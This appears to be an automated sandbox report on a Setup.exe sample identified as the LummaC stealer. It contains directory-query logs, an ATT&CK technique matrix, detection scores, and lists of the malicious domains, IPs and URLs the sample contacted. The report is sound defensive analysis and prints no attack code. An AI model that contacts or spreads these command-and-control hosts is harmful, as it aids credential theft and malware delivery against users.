Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Directory queried: number of queries: 1001

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	23 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	12 Process Injection	2 Obfuscated Files or Information	11 Input Capture	24 System Information Discovery	Remote Desktop Protocol	21 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	11 Input Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	111 Masquerading	NTDS	3 Process Discovery	Distributed Component Object Model	1 Clipboard Data	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	221 Virtualization/Sandbox Evasion	LSA Secrets	221 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Setup.exe	35%	Virustotal		Browse
Setup.exe	32%	ReversingLabs	Win32.Ransomware.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	0%	ReversingLabs

Source	Detection	Scanner	Label
https://dfgh.online/invoker.php?compName=user-PC	100%	Avira URL Cloud	malware
http://ocsp.sectigo.com0D	0%	Avira URL Cloud	safe
throwlette.cyou	100%	Avira URL Cloud	malware
https://klipgonuh.shop/int_clp_sha.txt	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	high
steamcommunity.com	104.102.49.254	true	false	high
sputnik-1985.com	104.21.32.1	true	false	high
klipgonuh.shop	172.67.162.153	true	false	high
robinsharez.shop	unknown	unknown	true	unknown
versersleep.shop	unknown	unknown	true	unknown
chipdonkeruz.shop	unknown	unknown	true	unknown
femalsabler.shop	unknown	unknown	true	unknown
soundtappysk.shop	unknown	unknown	true	unknown
vqOdvwsaFkSmirvHugHUcNrMgvS.vqOdvwsaFkSmirvHugHUcNrMgvS	unknown	unknown	true	unknown
crowdwarek.shop	unknown	unknown	true	unknown
dfgh.online	unknown	unknown	false	high
apporholis.shop	unknown	unknown	true	unknown
handscreamny.shop	unknown	unknown	true	unknown
throwlette.cyou	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199724331900	false		high
robinsharez.shop	false		high
versersleep.shop	false		high
soundtappysk.shop	false		high
crowdwarek.shop	false		high
handscreamny.shop	false		high
apporholis.shop	false		high
https://cegu.shop/8574262446/ph.txt	false		high
chipdonkeruz.shop	false		high
https://sputnik-1985.com/api	false		high
https://klipgonuh.shop/int_clp_sha.txt	false	Avira URL Cloud: malware	unknown
femalsabler.shop	false		high
throwlette.cyou	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	Setup.exe	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000011.00000002.2956214341.000000000614D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	Setup.exe	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	Setup.exe	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	Setup.exe	false		high
http://ocsp.sectigo.com0	Setup.exe	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.2952472726.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.2952472726.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000011.00000002.2952472726.000000000540B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	Setup.exe	false		high
https://contoso.com/License	powershell.exe, 00000011.00000002.2956214341.000000000614D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000011.00000002.2956214341.000000000614D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dfgh.online/invoker.php?compName=	powershell.exe, 00000011.00000002.2951957964.0000000003210000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.13.dr	false		high
http://www.autoitscript.com/autoit3/X	Vulnerability.com, 0000000D.00000000.2096014206.0000000000815000.00000002.00000001.01000000.00000008.sdmp, Affects.9.dr, Vulnerability.com.2.dr	false		high
https://dfgh.online/invoker.php?compName=user-PC	powershell.exe, 00000011.00000002.2952472726.0000000005246000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2959149859.0000000007823000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	Setup.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	Setup.exe	false		high
https://www.autoitscript.com/autoit3/	Vulnerability.com.2.dr, Computing.9.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.2952472726.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	Setup.exe	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000011.00000002.2952472726.00000000050F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	Setup.exe	false		high
https://contoso.com/	powershell.exe, 00000011.00000002.2956214341.000000000614D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000011.00000002.2956214341.000000000614D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dfgh.online	powershell.exe, 00000011.00000002.2952472726.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dfgh.online/invoker.php?compname=	powershell.exe, 00000011.00000002.2952298749.0000000003470000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/favicon.ico	5UHUPPG78GSXH8YIM9UYVJ0NVOM81L5.exe.13.dr	false		high
https://developers.cloudflare.com/r2/data-access/public-buckets/	5UHUPPG78GSXH8YIM9UYVJ0NVOM81L5.exe.13.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000011.00000002.2952472726.00000000050F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	Setup.exe	false		high
http://ocsp.sectigo.com0D	Setup.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.32.1	sputnik-1985.com	United States	13335	CLOUDFLARENETUS	false
185.161.251.21	cegu.shop	United Kingdom	5089	NTLGB	false
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
172.67.162.153	klipgonuh.shop	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588280
Start date and time:	2025-01-10 23:26:28 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@30/31@15/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 46 Number of non-executed functions: 42
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6008 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
17:27:20	API Interceptor	1x Sleep call for process: Setup.exe modified
17:27:24	API Interceptor	16x Sleep call for process: Vulnerability.com modified
17:28:48	API Interceptor	9x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.32.1	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
104.21.32.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	redroomaudio.com/administrator/index.php
185.161.251.21	Setup.exe	Get hash	malicious	LummaC	Browse
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	setup.exe	Get hash	malicious	LummaC	Browse
	'Set-up.exe	Get hash	malicious	LummaC	Browse
	SET_UP.exe	Get hash	malicious	LummaC	Browse
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cegu.shop	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	185.161.251.21
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	'Set-up.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	SET_UP.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
steamcommunity.com	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	HouseholdsClicking.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	davies.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	FeedStation.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	fghj.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
sputnik-1985.com	HouseholdsClicking.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	FeedStation.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	fghj.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	filename.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	expt64.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTLGB	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	185.161.251.21
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	212.250.45.83
	sora.arm.elf	Get hash	malicious	Mirai	Browse	82.5.147.126
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	armv4l.elf	Get hash	malicious	Unknown	Browse	82.4.86.227
	Fantazy.sh4.elf	Get hash	malicious	Unknown	Browse	77.98.100.100
	Fantazy.mips.elf	Get hash	malicious	Unknown	Browse	82.3.7.151
AKAMAI-ASUS	Bontrageroutdoors_Project_Update_202557516.pdf	Get hash	malicious	Unknown	Browse	96.17.64.171
	invoice_AG60538.pdf	Get hash	malicious	Unknown	Browse	96.17.64.171
	Message 2.eml	Get hash	malicious	Unknown	Browse	104.102.34.105
	frosty.spc.elf	Get hash	malicious	Mirai	Browse	95.101.248.46
	Message.eml	Get hash	malicious	Unknown	Browse	184.28.90.27
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	HouseholdsClicking.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	davies.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
CLOUDFLARENETUS	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.223.109
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.11.60
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	104.21.96.1
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.162.153 104.21.32.1 185.161.251.21
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254 172.67.162.153 104.21.32.1 185.161.251.21
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	104.102.49.254 172.67.162.153 104.21.32.1 185.161.251.21
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.162.153 104.21.32.1 185.161.251.21
